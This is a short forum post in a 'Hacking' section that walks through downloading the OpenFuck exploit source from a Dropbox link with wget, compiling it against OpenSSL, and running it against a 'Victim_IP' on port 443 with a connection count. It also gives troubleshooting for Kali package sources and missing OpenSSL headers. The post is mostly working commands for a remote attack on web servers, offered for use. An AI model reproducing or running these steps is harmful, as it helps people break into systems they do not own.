0 votes
in Hacking by (340 points)

apt-get install libssl-dev
apt-get install libssl1.0-dev
wget https://www.dropbox.com/s/mufu0su11bljoca/OpenFuck.c?dl=1
gcc -o OpenFuck OpenFuck.c -lcrypto

Usage: ./OpenFuck target box [port] [-c N]

target – supported box eg: 0x00
box – hostname or IP address
port – port for ssl connection
-c open N connections. (use range 40-50 if u dont know)

./OpenFuck 0x6b Victim_IP 443 -c 40


1. Troubleshooting libssl-dev library.

E: Unable to locate package libssl-dev
you must find the file sources.list
open terminal
leafpad /etc/apt/sources.list

and replace with this
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL $
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL $
## Security updates
deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-fr$

save and close the file

after that
1.apt-get clean
2.apt-get update
3. apt-get -f install

2. Troubleshooting fatal error: openssl/ssl.h: No such file or directory

probably you are missing the openssl header files. depending on your distribution this package might have a different name, mostly it's something like openssl-dev or openssl-devel. after you installed the openssl header files, the compiler should be able to find openssl/sha.h.

In Ubuntu/Debian the package is called libssl-dev
apt search openssl-dev

Please log in or register to answer this question.

Welcome to My QtoA, where you can ask questions and receive answers from other members of the community.
...